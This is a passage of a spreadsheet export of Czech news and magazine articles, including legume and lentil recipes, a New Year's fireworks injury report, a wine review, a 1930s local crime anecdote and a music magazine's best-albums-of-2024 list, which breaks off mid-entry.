zasypali ve vyšší vrstvě. Nechte alespoň 15–20 minut působit a pak na skvrnu co nejrychleji nalijte vodu. Kouřové signály Ať už jste něco připálili, nebo chcete vyhnat z bytu cigaretový kouř po večírku, nejprve pořádně otevřete dokořán okna a vyvětrejte. Poté namočte hadr do octové vody, vyždímejte a mávejte jím po celém bytě. "Článek vyšel v časopise Blesk pro ženy 12/22" Text: bla Autor: Laura Poláková Autor person Laura Poláková</t>
  </si>
  <si>
    <t>7060</t>
  </si>
  <si>
    <t>5340</t>
  </si>
  <si>
    <t>20250101_457_3692508546_1c08bf3f42b6ae5910ca.html</t>
  </si>
  <si>
    <t>1c08bf3f42b6ae5910ca</t>
  </si>
  <si>
    <t>Nebojte se luštěnin</t>
  </si>
  <si>
    <t>Nebojte se luštěnin Rubrika: Pestré recepty Inspirace pro tento týden Jsou zdraví prospěšné, nezatíží peněženku, a když je správně připravíte, můžete si na nich báječně pochutnat. Přesto Češi do svého jídelníčku luštěniny zařazují méně, než by měli. Co takhle to v novém roce napravit? Obsahují velké množství vlákniny a bílkovin, zato jen minimum tuku. Mají nízký glykemický index, proto člověka zasytí na delší dobu. Jsou zdrojem řady vitaminů a minerálů a jejich užití v kuchyni je všestranné. A v neposlední řadě stojí pár korun. Přesto nad luštěninami řada lidí ohrnuje nos. My vám ale chceme ukázat, že se s nimi dá v kuchyni doslova kouzlit a vy díky nim s minimálními náklady můžete připravit řadu chutných receptů. Nadýmavým účinkům lze předejít Od konzumace luštěnin řadu lidí odrazuje zdlouhavá příprava a nadýmavé účinky. To druhé lze minimalizovat tím, že luštěniny před vařením namočíte aspoň na osm hodin. Poté je důkladně propláchněte a uvařte v nové vodě. Když do ní přidáte bylinky jako fenykl, majoránku, kmín nebo saturejku, nadýmavé účinky ještě snížíte. A pamatujte, že čím častěji je budete konzumovat, tím méně tento vedlejší efekt pocítíte – vaše tělo si zkrátka zvykne. Co se přípravy týče, zkrátí ji právě zmíněné namáčení a následně příprava v tlakovém hrnci. Doporuču- Zdlouhavému vaření se můžete vyhnout jeme také uvařit vždy větší množství a přebytek poté po jednotlivých porcích zamrazit. Budete tak mít vždy po ruce přichystaný základ výživného jídla. Anebo vsaďte na předvařené luštěniny v konzervě. Tady ale pamatujte, že je vždy třeba je propláchnout od nálevu, který rovněž nadýmá. JAK JE UCHOVÁVAT? Skladování sušených luštěnin je snadné. Dbejte hlavně na to, aby byly dobře uzavřené a nepronikli k nim moli. Hrachová kaše s vejcem a uzeninou Rozpis na 4 porce: ● 300 g žlutého hrachu, půleného ● 1 lžíce oleje ● 3 střední cibule ● 1 lžička chilli koření ● 1 lžička mletého zázvoru ● 2 stroužky česneku ● sůl ● mletý černý pepř ● 1 lžíce majoránky ● 4 paprikové klobásy ● 4 vejce ● jarní cibulka 1Hrách namočíme nejméně na 6 hodin do vody. Poté ho scedíme, zalijeme čerstvou vodou (asi 1200 ml), přivedeme k varu a vaříme pod pokličkou asi 45 minut. Dle potřeby přidáme vodu. 2V pánvi na oleji opečeme nadrobno nakrájenou cibuli. Přidáme chilli a zázvor, utřený česnek a dále krátce restujeme. Tuto směs vsypeme do téměř uvařeného hrachu, přidáme sůl a krátce povaříme. Poté hrách rozmixujeme tak, aby zhoustl. Nakonec dle potřeby dosolíme, opepříme a vmícháme majoránku, zakryté udržujeme v teple. 3Klobásy podélně rozkrojíme na vrchní straně nařežeme a opečeme z obou stran dozlatova. 4V rozpálené pánvi opečeme vejce, osolíme, opepříme, na talíře rozdělíme kaši, přidáme klobásu, vejce, nasekanou jarní cibulku a podáváme. 70 minut 3338 kJ/797 kcal 110 Kč* Italské těstoviny s cizrnou Rozpis na 4 porce: ● 60 ml olivového oleje + na pokapání ● 4 stroužky česneku ● rozmarýn ● sůl ● 2 chilli papričky ● 2 lžíce rajského protlaku ● 120 ml bílého suchého vína ● 225 ml sterilované cizrny ● 1600 ml zeleninového vývaru ● mletý černý pepř ● 400 g těstovin ● 100 g barevných rajčat ● tymián ● 80 g pecorina 1V kastrolu opečeme na oleji drcený česnek a snítku rozmarýnu, lehce osolíme a za častého míchání restujeme dozlatova, přidáme nakrájené chilli a dále restujeme, přimícháme protlak a mícháme asi 1 minutu, vmícháme víno a dále vaříme. 2Kastrol sejmeme z ohně, odstraníme rozmarýn a přidáme třetinu cizrny, 240 ml vývaru a ponorným mixérem směs rozmixujeme dohladka. Vmícháme zbývající cizrnu, 710 ml vývaru a pepř. Podle chuti osolíme. 3Cizrnovou směs přivedeme k varu, vmícháme těstoviny a za častého míchání vaříme, dokud těstoviny nebudou al dente a tekutina se nezredukuje na konzistenci mezi polévkou a omáčkou, v případě potřeby rozředíme vodou. 4Odstavíme z ohně, přidáme na čtvrtiny nakrájená rajčata, tymián, nastrouhaný sýr pecorino a rychle promícháme, osolíme. Každou porci zakapeme olivovým olejem, posypeme sýrem a podáváme. 60 minut 2313 kJ/669 kcal 140 Kč* Kuřecí steak s fazolkovým salátem Rozpis na 4 porce: ● 600 g kuřecích prsou ● sůl ● mletý černý pepř ● 2 lžíce olivového oleje ● 500 g fazolových lusků ● 1 červené cibule ● 4 žlutá rajčata ● ½ lžíce červený vinný ocet ● hrst hrachových výhonků 1 Maso očistíme, omyjeme, naklepeme, osušíme, osolíme, opepříme, zakapeme olejem a opečeme na grilovací pánvi z obou stran dozlatova, snížíme teplotu a dopečeme, necháme odležet pod pokličkou. 2Fazolové lusky očistíme, uvaříme v osolené vroucí vodě al dente, scedíme, propláchneme studenou vodou, a necháme okapat. 3Cibuli oloupeme, nakrájíme a opečeme na oleji v pánvi, přidáme fazolky, nakrájená rajčata, zlehka promícháme a dochutíme solí, pepřem a vinným octem. Nakonec vmícháme výhonky hrášku. 4Fazolky s rajčaty rozdělíme na talíře, přidáme steak, zalijeme vypečenou šťávou a ihned podáváme. 35 minut 1300 kJ/310 kcal 170 Kč* Hovězí roláda s fazolovou náplní Rozpis na 4 porce: ● 800 g zadního hovězího masa ● sůl ● mletý černý pepř ● ½ lžíce dijonské hořčice ● 4 plátky schwarzwaldské šunky ● 200 g sterilovaných červených fazolí ● 100 g mražených zelených fazolek ● 2 stroužky česneku ● tymián ● 2 kukuřičné klasy ● 2 červené papriky ● 200 g žampionů ● 2 červené cibule 1Maso rozkrojíme na větší plát. Rozklepeme ho přes fólii, osolíme a opepříme, potřeme hořčicí, poklademe plátky šunky. Sterilované fazole necháme okapat. Zelené fazolky propláchneme a necháme okapat. Česnek oloupeme a prolisujeme. Zelené fazolky i fazole dáme do misky, přidáme česnek, lístečky tymiánu, osolíme, opepříme a promícháme. 2Fazolovou směs rozprostřeme na připravený plát masa, pevně stočíme do rolády a převážeme provázkem. V pánvi rozpálíme olej a roládu na něm zprudka opečeme. Pak ji přendáme do pekáčku, podlijeme trochou vody a pečeme při 180 °C asi 60 minut doměkka. 3Mezitím nakrájíme na kolečka kukuřičné klasy, dále nakrájíme papriku, žampiony, červenou cibuli, osolíme, opepříme a vše na posledních 15 minut přidáme k roládě spolu s tymiánem. 4Hotovou roládu vyjmeme z trouby s pečenou zeleninou, zakryjeme, necháme cca 20 minut odležet, poté nakrájíme na plátky a podáváme s pečenou zeleninou. 120 minut 2087 kJ/500 kcal 260 Kč* Kari z červené čočky Rozpis na 4 porce: ● 2 lžíce rostlinného oleje ● 1 cibule ● 100 g dýně hokkaido ● 2 stroužky česneku ● 1 lžička kari pasty ● 1 lžička římského kmínu ● 50 g zázvoru ● 1 plechovka krájených rajčat ● 1 lžička kurkumy ● 300 g červené čočky ● 1 červená paprika ● 300 ml zeleninového vývaru ● 100 ml kokosového mléka ● koriandr ● petržel ● ½ lžíce sójové omáčky ● 100 g ředkviček ● 1 rajče ● 60 g hrášku 1 V kastrolu na oleji opečeme cibuli nakrájenou nadrobno, přidáme kostičky dýně, nasekaný česnek, kari pastu, římským kmín a nastrouhaný zázvor, restujeme asi 3 minuty. 2Přidáme sterilovaná rajčata, kurkumu, čočku, červenou papriku nakrájenou na menší kousky a zalijeme vroucím vývarem. 3Vaříme za občasného promíchání asi 20 minut, na závěr do kari vmícháme kokosové mléko, nasekaný čerstvý koriandr, petržel a dochutíme sójovou omáčkou. 4Do hotového kari přidáme na plátky nakrájené ředkvičky, rajče a propláchnutý hrášek. Zakryjeme a necháme cca 5 minut prohřát, poté podáváme například s dušenou rýží. 35 minut 2620 kJ/625 kcal 110 Kč* * Cena je orientační za celý rozpis bez doporučených příloh. Doba přípravy je bez doby tuhnutí. Energetická hodnota se vztahuje na jeden kousek. Foto: Getty Images (1), archiv firem (1), Produkce Kulinární studio MAFRA , www.kulinarnistudio.cz, redaktorka: T. Krejčí, styling: P. Součková Pomahačová, foodstyling: P. Ján . Kuchyňské spotřebiče Whirlpool, nádobí zapůjčili ASA, velkoobchod Fantazie, www.asa-selection.cz, Tchibo, www.tchibo.cz. Foto: Kulinární studio MAFRA/S. Pomahač (6). Rubrika transition_slide Pestré recepty</t>
  </si>
  <si>
    <t>145000</t>
  </si>
  <si>
    <t>20250101_458_3692541553_91535ed4bea5e80564a0.html</t>
  </si>
  <si>
    <t>91535ed4bea5e80564a0</t>
  </si>
  <si>
    <t>Novoroční čočka netradičně: Vyzkoušejte skvělé recepty foodblogerů</t>
  </si>
  <si>
    <t>Novoroční čočka netradičně: Vyzkoušejte skvělé recepty foodblogerů Dodržujete tradiční český zvyk jíst na Nový rok čočku? Právě proto, že svým vzhledem připomíná peníze, má zajistit, že jich budeme mít v nastávajícím roce dostatek. Klasikou je čočka nakyselo, ale ne všem chutná. Zkuste s námi čočku v modernějším, netypickém pojetí. Proč se jí čočka na Nový rok? Neopouštějte starý novoroční zvyk a pochutnejte si na vařené čočce! Pokud si ji dopřejete hned v prvním dni nového roku, má vám po celou jeho dobu podle pověry přinést dostatek peněz. Že vám klasická čočka nechutná? V tom případě zkuste některý z následujících moderních receptů, díky nimž zjistíte, že čočka může chutnat jinak, než jste zvyklí . Tato výživná luštěnina obsahuje množství bílkovin, železo a kyselinu listovou, navíc má málo tuku, a proto je vhodné ji zařadit do jídelníčku nejen na první den nového roku. Uvidíte, bude chutnat i dětem . Kořeněná černá čočka s mrkví Na tomto jednoduchém pokrmu si pochutnají i zarytí vegetariáni. Místo klasické čočky použijeme čočku černou – Belugu . Jak popisuje autorka receptu Míša Šupáková, je drobná, rychle uvařená a po uvaření perfektně drží tvar . Název získala díky svému vzhledu – uvařená je lesklá a vypadá jako černý kaviár Beluga. Můžete si ji uvařit jako běžnou čočku nebo ji použít do salátu či na ozdobu chlebíčků. Míša, jejíž recepty najdete na foodblogu Cooking with Šůša , ji připravila s orestovanou mrkvičkou, kari a zázvorem. Co budete potřebovat: 200 g černé čočky 2 mrkve 1 cibuli lžíci másla ½ lžičky kari ½ lžičky sušeného zázvoru (mletého) sůl vejce (na volské oko) Postup: Černou čočku uvařte podle návodu na obalu a odložte stranou. Na másle orestujte nadrobno nakrájenou cibuli, po chvilce přidejte očištěnou a na plátky nastrouhanou mrkev a restujte ještě dalších asi 5 minut. Okořeňte zázvorem, kari, osolte a nakonec vmíchejte uvařenou čočku. Podávejte s volským okem. Salát s čočkou Beluga, cuketou a avokádem I v druhém receptu od Míši opět využijeme černou čočku a pomocí limetkové zálivky, cukety a avokáda vytvoříme lehký salátek. Salát je rychlý na přípravu a jediné, co musíte uvařit, je čočka . Pak už jen stačí nakrájet ostatní suroviny. Co budete potřebovat: 1 hrnek čočky Beluga 1 menší cuketu 1 zralé avokádo šťávu z půlky limetky hrst mátových lístků 2 lžíce olivového oleje hrubozrnnou mořskou sůl Postup: Čočku uvařte podle návodu na obalu, vodu slijte a odložte stranou. Cuketu oloupejte a škrabkou na brambory naloupejte na tenké plátky. Avokádo nakrájejte na menší kostičky. Takto připravenou zeleninu vmíchejte do čočky, přidejte limetkovou šťávu, nakrájené lístky máty, olivový olej a sůl. Vše promíchejte a můžete podávat. Čočka s klobáskou z Umbrie Nelekejte se při čtení názvu, že klobásky z Umbrie doma nemáte! Z vepřového masa si je totiž připravíte sami, a to podle receptu manželské dvojice, kterou tvoří Kuba a Blanka Kardovi. Znát je můžete z foodblogu Kublanka vaří doma . V hlavní roli se tentokrát představí čočka zelená . Co budete potřebovat: Na čočku: 2 stroužky česneku – oloupané a rozmáčknuté 50 g sušených rajčat v olivovém oleji – nakrájených na nudličky 6 lžic olivového oleje 250 g francouzské zelené čočky 450 ml kuřecího vývaru 2 stonky řapíkatého celeru – nakrájený najemno Na klobásky: 500 g mletého vepřového masa (např. libovější krkovice) 50 ml červeného vína 1 lžičku semen fenyklu 1 chilli papričku – zbavenou semínek, nakrájenou najemno 1 lžičku najemno nasekaného rozmarýnu olivový olej na smažení čerstvě mletý černý pepř sůl Postup: Ve velké pánvi rozehřejte na mírném ohni 6 lžic olivového oleje a nechte na něm orestovat nakrájená rajčata spolu s rozmáčklými stroužky česneku. Jakmile začnou stroužky česneku zlátnout, přidejte čočku, řapíkatý celer a zalijte kuřecím vývarem. Nechte vařit na mírném ohni za občasného míchání do změknutí (20 až 30 minut). Uvařenou čočku stáhněte z ohně, zakryjte poklicí a udržujte až do podávání v teple. Mleté maso důkladně promíchejte s najemno nakrájenou chilli papričkou, semeny fenyklu, červeným vínem , pepřem a solí. Z dobře promíchaného masa tvarujte klobásky o průměru 3 cm a o délce 8 cm (5 až 6 kusů) a zabalte je do alobalu – jeho konce dobře utáhněte. Ve velkém hrnci přiveďte k varu větší množství vody, ve které nechte 2 až 3 minuty klobásky zabalené v alobalu povařit. Díky tomu budou držet pohromadě. Jakmile vyplavou na hladinu, vyndejte je z vody a nechte mírně vychladnout. Poté je vybalte z alobalu a potřete olivovým olejem. Smažte nebo grilujte je na mírném ohni ze všech stran dozlatova (asi 5 minut). Opečené klobásky přidejte do pánve s čočkou a na mírném ohni nechte vše povařit zhruba 5 minut. Ihned podávejte. Pokud máte rádi přílohu, můžete zvolit bílý chléb nebo uvařené brambory. Teplý salát s houbami a čočkou U některých ingrediencí byste řekli, že se k sobě hodit nebudou, když je ale vyzkoušíte pospolu, zjistíte, že je to fenomenální! A stejně je tomu s následujícím receptem, který připravila Kaya Kounová Roubíčková, jejíž recepty najdete na foodblogu S vášní pro jídlo . V hlavní roli se opět představí černá čočka . Co budete potřebovat: 200 g čočky Beluga 200 g drobných pevných lesních hub na plátky olivový olej stroužek česneku sůl šťávu z poloviny citronu balení rukoly Postup: Čočku propláchněte a podle návodu uvařte doměkka, ale ať se vám nerozvaří! Na olivovém oleji nechte zesklovatět nadrcený česnek, přidejte plátky hub, osolte a zvolna opékejte dozlatova. Až se houby opečou, odstavte je z pánve a na stejném oleji (podle potřeby olej přilijte) se zbytky česneku krátce opečte i čočku. V misce ji pak promíchejte s houbami, zakápněte citronovou šťávou a dosolte. Salát na talíři posypte rukolou, sýromilci mohou přidat ještě parmazán. Marocká kořeněná čočka Ochutnáváte-li rádi exotická jídla, mohl by vás zaujmout recept, v němž Kaya kombinuje čočku s římským kmínem, kurkumou a koriandrovými semínky. Co budete potřebovat: dvě hrsti čočky (ideální by spíš byla malá zrna, já použila klasickou) cibuli velké rajče polovinu papriky lžíci rajčatového protlaku stroužek česneku po lžičce mletého římského kmínu, kurkumy, pepře, koriandrových semen a papriky dvě lžíce olivového oleje dvě lžíce čerstvého koriandru sůl Postup: Čočku uvařte podle návodu. Mezitím nechte na oleji zesklovatět nadrobno nakrájenou cibuli, přidejte nasekaný česnek a všechno mleté koření a ještě dvě minuty opékejte. Přisypte na kostky nakrájené rajče, papriku, protlak, koriandr a trochu vody a nechte provařit několik minut do změknutí zeleniny. Nakonec přidejte uvařenou čočku a dosolte. Výsledná směs by měla mít kolem sebe trochu omáčky a podle chuti je možné přidat chilli, které tomu dodá říz. Autor: Veronika Matoušková Autor person Ivana Štědrá</t>
  </si>
  <si>
    <t>20250101_459_3695361073_d9b03ba3fe2e2a18b949.html</t>
  </si>
  <si>
    <t>d9b03ba3fe2e2a18b949</t>
  </si>
  <si>
    <t>Šest zraněných od pyrotechniky ve Středočeském kraji, desítky intoxikovaných</t>
  </si>
  <si>
    <t>Šest zraněných od pyrotechniky ve Středočeském kraji , desítky intoxikovaných Zdravotní záchranná služba Středočeského kraje měla i letos perný silvestrovský den. Ošetřovala pacienty zraněné pyrotechnikou a obrovské množství těch, kdo nezvládli silvestrovské popíjení. "Během letošních silvestrovských oslav jsme zasahovali u šesti pacientů, kteří se zranili zábavní pyrotechnikou, a čtyř lidí popálených od pyrotechniky. Dále jsme měli v péči 46 lidí s intoxikací alkoholem . První výjezd v souvislosti se zábavní pyrotechnikou měla posádka z Kolína pět minut po půlnoci. Pro srovnání, během loňské 12hodinové silvestrovské směny jsme ošetřili tři zraněné od pyrotechniky a dvanáct lidí s alkoholovou intoxikací," uvedla Monika Nováková, tisková mluvčí Zdravotní záchranné služby Středočeského kraje. Autor: Michaela Kadlecová Autor person Michaela Kadlecová</t>
  </si>
  <si>
    <t>421</t>
  </si>
  <si>
    <t>413</t>
  </si>
  <si>
    <t>20250101_46_3697441780_28ae9aa440826ba85e5f.html</t>
  </si>
  <si>
    <t>28ae9aa440826ba85e5f</t>
  </si>
  <si>
    <t>Víno Ryzlink rýnský 2023, pozdní sběr, Rodinné vinařství Sedlák</t>
  </si>
  <si>
    <t>Víno Ryzlink rýnský 2023, pozdní sběr, Rodinné vinařství Sedlák /100 1. 1. 2025 Výborné víno : Špičkově provedené odrůdové víno . Čisté s delší dochutí. Často nejlepší v poměru kvality a ceny. (0) 21. 10. 2024 „Polovina kupáže vinifikována v nerezu, kde i zrála, druhá ve velkém sudu. Víno široké a dlouhé, což je dáno jednak kvalitní surovinou, která vtělila výraznou mineralitu, jednak technologií, kde sud vnesl jemné prvky mikrooxidace a větší strukturu, kde se přetahují mladistvost a sudová nazrálost. Vínu dominuje mineralita s dobře zakomponovaným sudem. Ve vůni i v chuti meruňky, lipový květ, trochu citrusy a citelná kořenitost. Víno má vyšší viskozitu, solidní plnost i délku. Není to úplně můj nejoblíběnější styl RR, ale je to vynikající a velmi nadstandardní ryzlink - jak dobrými hrozny, tak technologií. Rozhodně není tuctový. P.S.: Více mi chutnal při nižší teplotě (okolo 8).“ (1) /100 31. 8. 2024 Výborné víno : Špičkově provedené odrůdové víno . Čisté s delší dochutí. Často nejlepší v poměru kvality a ceny. (0) Autor: MojeLahve.cz</t>
  </si>
  <si>
    <t>20250101_460_3700675809_3daf6956fc1fe372fc5a.html</t>
  </si>
  <si>
    <t>3daf6956fc1fe372fc5a</t>
  </si>
  <si>
    <t>Pevné přátelství</t>
  </si>
  <si>
    <t>Pevné přátelství František Kohl, 39letý strojní technik, a pomocný dělník Bedřich Kebat, staří kamarádi z Hostivaře , byli vlastně společníky v podnikání, kterému zasvětili dlouhou řadu let svého života. Chodili spolu krást a byli už také několikrát za své „vedlejší povolání“ uvězněni. Zlodějina je spojila a odpykané tresty jenom utvrdily jejich přátelství. Kohl byl ženatý a jeho manželce Marii se tohle přátelství pranic nelíbilo. Stále muži domlouvala a prosila, aby té zlodějiny nechal a od Kebata se nenechal svádět na scestí. Její domluvy však nepomáhaly, Kebat se stal denním hostem v rodině a zlým duchem Františka Kohla. Když se povedený kamarádíček jednoho lednového večera roku 1934 zase objevil a po dlouhém špitání se muži chystali ven, spustila manželka: „Zůstaneš doma! Já už toho mám dost, nikam nechoď!“ Kohl manželku pohladil po tváři a políbil ji: „Co tě Máňo napadá, za hodinku jsem doma. My si skočíme jen na jedno vedle do hospody.“ Minula půlnoc a manžel nikde. Marie unavená dlouhým čekáním usnula a tak ani netušila, kdy se František vrátil. Ten se vkradl nepozorovaně do domku a ráno konstatoval, že se zdržel s kamarády. „To byla velká sešlost, Máňo. Objevili se staří známí, museli jsme posedět.“ Odpoledne se otevřely dveře a v nich stáli četníci. „Kde je ukradené zboží?“ Marie s otevřenými ústy sledovala četníky, jak prohledávají stavení. Na půdě nalezli zboží bratru za čtyři tisíce korun. Povedená dvojice v noci vykradla konzum a sousední holírnu. Pokoušeli se ještě probourat do obchodu s látkami, ale to se nepovedlo. Četníci jim byli velmi brzy na stopě. Podezřelí samozřejmě zapírali. Že prý nic neukradli, všechno řádně koupili. Kde? V polích za Hostivaří . Kdy? K ránu. Od koho? Od jednoho neznámého, Míla mu říkali. Div, že nezačali tvrdit, že je zboží na splátky. Senát doktora Mráze se nenechal recidivisty ošálit a odsoudil je k osmi měsícům těžkého žaláře nepodmíněně. Tentokrát měla ale Marie naději, že zhoubný Kebatův vliv na Františka nebude pokračovat. Při vyšetřování vyšlo najevo, že Kebat je rodem i domovskou příslušností ze Splitu , z místa, kde svítí nejkrásnější hvězdy nad mořem, jak zpíval ve svém šlágru Jára Pospíšil . A soud rozhodl, že po odpykání trestu bude Bedřich vyhoštěn a poslán domů do Dalmácie . Takových, co si odskočí na pivo a přinesou domů zboží hned za čtyři tisíce, těch tu máme dost vlastních. Jestli se Kohl vrátil k poctivému životu, je otázkou nezodpovězenou, ale snad se toto přání Máně vyplnilo. Kterou hostivařskou hospůdku měli oba přátelé nejraději, lze těžko odhadnout Autor: Pavlína Nejedlíková, kronikářka Autor person Pavlína Nejedlíková</t>
  </si>
  <si>
    <t>20250101_461_3694770040_f12e63804a642ba89131.html</t>
  </si>
  <si>
    <t>f12e63804a642ba89131</t>
  </si>
  <si>
    <t>THE BEST OF 2024. Album roku? Temnota The Cure pohltila všechno</t>
  </si>
  <si>
    <t>THE BEST OF 2024. Album roku? Temnota The Cure pohltila všechno Redakce Headlineru sestavila svoje tradiční hudební best of. Tohle je 20 světových alb roku 2024, která nás bavilo poslouchat. Další díly budou brzy následovat. Vítejte v naší každoroční rekapitulaci uplynulého roku. Hudba nejsou závody. V redakční anketě Headlineru nesestavujeme žebříčky a pořadí. Vzhledem k žánrovému i generačnímu záběru našich redaktorů by něco takového ani nedávalo smysl. Hlavně si chceme sami sesumírovat, co zajímavého jsme za těch dvanáct měsíců slyšeli. A možná je to taky trochu návod. Pár tipů, jak do nového roku, ať už právě prožíváte cokoli, vykročit s dobrou hudbou. Jaká světová alba tedy redaktoři Headlineru v uplynulých měsících poslouchali nejčastěji? Ve světě, doma, v politických ani společenských náladách to nebyla žádná selanka. Možná právě proto se nejvíc z nás vracelo k fenomenální desce The Cure, kterou inspirovalo loučení se světem, odcházení a smrt obecně. Její recenzi si můžete připomenout zde . A temné tóny zní často i na ostatních „albech roku“, která podle redakce Headlineru natočili třeba Fontaines D.C. nebo Linkin Park . Světové album roku: The Cure – Songs Of A Lost World The Cure vydali po šestnácti letech nové album. Neúprosně vážné a smutné album obsahující osm dlouhých písní, ve kterých se kapela za ničím nežene a navzdory konečnosti života majestátně kráčí svým vlastním tempem rozklíženými kulisami hroutícího se světa na cestě do temných, bolestivých zákoutí lidské existence a předkládá posluchačům temnou stranu krásy. Přestože na Songs Of A Lost World nejsou žádné popové hity, psychedelické odbočky nebo rozmarné bangery, tak je na něm z hudebního hlediska všechno, co od The Cure chceme slyšet. Jsou tam expresivní rozmáchlé a postupně vrstvené instrumentace, jsou tam opulentní orchestrální pasáže, jsou tam odzbrojující tlusté basové linky i rozechvělé bicí postavené na výrazném tom-tomu... Marek Reinoha V době, kdy i singl je pro posluchače moc dlouhý útvar se The Cure vrátili s opulentní, temnou, nejednoduchou, těžkou a soudržnou deskou, která si vyžaduje pozornost. První singl má skoro sedm minut, zpívat se v něm začne až někdy za půlkou. A s každou další vteřinou téhle magické nahrávky o smrti je samozřejmé, že pomíjívost, o které Robert Smith tak dokonale zpívá, se netýká jenom lidské existence, ale všech trendů. Opus! Honza Vedral Šestnáct let jsme na to čekali a konečně jsme se dočkali! Robert Smith a jeho parta nahráli krásnou desku která nemá slabý moment, je to drama, je to smutek, je to krása! Takový cit pro písničku jako mají The Cure to se dnes moc nevidí a Robertův hlas? To je stroj času… wlado Tady není o čem debatovat. Jediná chyba desky je, jak neúnosně dlouho o ní Robert Smith furt mluvil a skutek utek. Ale čekání se vyplatilo. Jarda Konáš Když se na něco čeká tak dlouho, může se z výsledku stát jen splnění úkolu. The Cure se ale podařilo všechny napnout k prasknutí, některé možná už spíš i otrávit, a pak si je omotat kolem prstu. Skvělá hudba prostě nemá expiraci. Šárka Hellerová Dlouhé čekání přineslo ovoce. The Cure na roky vyhlíženém novém albu přinesli vybroušené, vrstevnaté aranže, nekompromisní stavbu písní (viz třeba zdánlivě zbytečně dlouhá intra) a nepateticky srdceryvné texty podané Smithovým hlasem, který jako kdyby nezestárnul ani o den. Písně ztraceného světa jsou po všech stránkách fantastická deska. Ondřej Kubín VÝBĚR Z REDAKČNÍHO BEST OF 2024 Hudba nejsou závody. V jednotlivých kategoriích jsme se proto rozhodli vyhlásit vždy jednoho interpreta a počin, na kterém se nás shodlo nejvíc redaktorů Headlineru. A v následujících tipech především brouzdáme na osobní vlně zajímavostmi napříč žánry. Řadíme je abecedně a za poslech stojí všechny. Ángeles Toledano – Sangre Sucia Fenomén Rosalía nabral ve španělském flamenku na obří síle: alba následovnic přitom představují úžasný druh manifestu mladé ženské flamenkové generace a její propojení tradiční klasiky s elektronikou, hip hopem a popem nejenže mluví jazykem současnosti, zahrnuje také feministickou a emancipační agendu. Jiří Moravčík Aoife O'Donovan – All My Friends Na zahraniční scéně na mě letos nejvíc zapůsobila alba z menšinových žánrů nebo z klasické hudby. Asi největší stopu na mojí hudební duši letos zanechala málo známá folková zpěvačka Aoife O'Donovan s albem All My Friends. Dany Stejskal David Gilmour : Luck and Strange To, že je vám skoro osmdesát a že jste v aukci prodali před stovku svých kytar, ještě neznamená, že si nemůžete koupit pár nových a natočit dost možná nejlepší sólovou desku kariéry. Přesně to taky David Gilmour udělal, s vydatnou pomocí rodiny (manželka, děti), starých parťáků ( Guy Pratt , zesnulý Richard Wright ) a mladého producenta Charlieho Andrewa, nezatěžkaného přehnaným respektem k historii Pink Floyd . Vzešlo z toho zvukově dokonalé album plné melancholických textů a luxusních kytarových sól. Ondřej Kubín Denzel Curry - King of the Mischievous South Ze světového rapu mě nová deska Denzela Curryho bavila ještě víc než CHROMAKOPIA Tylera, The Creatora nebo GNX Kendricka Lamara . Ať už jsou to hravé featuringy, tvrdé beaty, anebo nekompromisní flow, kterou je Curry pověstný, rapper dokázal vytvořit zábavné album od první do poslední písně. Z tracků mě nejvíce baví HOT ONE s A$AP FERGem a TiaCorine. Těším se, až tracky ze svého alba zahraje na svém koncertě 9. 6. 2025 v Pražském ROXY. Petr Malásek Fontaines D.C. – Romance Rok 2024 byl rokem ostrovních kytarovek. „Fontáni“ navazují na geniální desku Skinty Fia. Ubrali post-punku a žánrově se rozkročili. Vždyť takovou titulní Romance by klidně mohla zpívat Lana Del Rey . Kapela je ve formě a po zásluze se (konečně) vyšvihla mezi největší evropské kytarovky! wlado Romance je brilantní a okázalé rockové album plné kontrastů, barev a silných melodií, na kterém Fontaines D.C. zkoumají různé segmenty kytarového rocku, a na kterém prokázali (opět) jak jsou zkušení, vyzrálí a sebevědomí skladatelé a hudebníci. Ale také to, že umí být nejen nihilističtí, ale i romantičtí, poetičtí a zábavní. Album se vzpírá veškerým očekáváním, podkopává to, co jste si mysleli, že o Fontaines D.C., víte a otevírá jejich hudbu širšímu okruhu posluchačů, aniž by se jim prvoplánově podbízela. Kapela na Romance postavila do popředí svoji schopnost vystavět silné popové melodie, která byla na předchozích albech nenápadně skryta a pouze místy probleskovala, a i nástrojové pojetíe přes svoji nenucenou agresivitu zní o poznání popověji. To album má potenciál vystřelit Fontaines D.C. na pozici jedné z největších kytarových kapel současnosti. Marek Reinoha Pro Griana Chattena a jeho kapelu v posledních letech zahořel kdekdo. Album Romance tohle vzplanutí mění v opravdovou lásku. Šárka Hellerová Na tomto albu jsme svědky toho, jak se z malé irské kapely pro pár nadšenců stal fenomén současné hudební scény. Honza Vedral Charli XCX – Brat Jestli existuje album, které definovalo léto roku 2024, tak je to rozhodně Brat od Charli XCX. Její hlas v kombinaci s elektronickými beaty se stal esencí večerů plných špatných rozhodnutí. Album plně definuje náladu dlouhých letních večerů, party a dní, kdy se první lahve otevírají až moc brzy. Za mě nejen album léta, ale i celého roku. Petr Malásek Tak výtečná deska, že dala vzniknout fenoménu Brat Summer. Charli XCX se přiklonila víc k elektronice a klubovému zvuku a dopadlo to výborně. Tak do tance, mládeži! Jarda Konáš Linkin Park : From Zero Moc zajímavých věcí se v roce 2024 na zahraniční rockové scéně neudálo, už několik let probíhá éra rockového úpadku. Oživení Linkini to proto měli lehké. Ocenění si zaslouží nejen za hudbu, ale i za sílu nezabalit to, pokračovat dál a díky nové zpěvačce všechno ještě někam dál posunout. Josef Vlček Velkolepý návrat nu-metalové legendy je asi mou jedničkou zejména ze sentimentálních důvodů. Třešničkou na dortu je fakt, že jsem si desku jednak opravdu užil a jednak je velmi dobře produkčně zpracována. Vojtěch Vanda Knocked Loose: You Won't Go Before You're Supposed To Američtí Knocked Loose loni vystřelili do povědomí širší veřejnosti s třetí deskou You Won't Go Before You're Supposed To a přiznám se, že mě samotného překvapilo, jak obrovský úspěch kapela s nahrávkou zaznamenala. Nejenomže jí deník The Guardian a renomovaný magazín Kerrang! přidělily maximální počet hvězdiček v recenzích, ale kapela se rovněž dostala třeba do takového televizního pořadu jako je populární Jimmy Kimmel Live. Tenhle kulervoucí přímočarý hardcore s nesmírně průraznými bicími je tak neuvěřitelně živelný a šílený zároveň, že letos zkrátka neměl ve svém ranku konkurenci. Kdo navíc vyhledává skutečně hystericky znějící screamy, charismatický frontman Bryan Garris ho zaručeně uspokojí. Lukáš Rešl The Last Dinner Party: Prelude to Ecstasy Fandím jim od první písničky, co jsem slyšel. A že v téhle artpopové partě divoženek skutečně „něco je“ se potvrdilo i na jejich debutu. I když si pořád myslím, že ty songy fungují ještě o chlup lépe naživo. I takhle zní Británie ! Honza 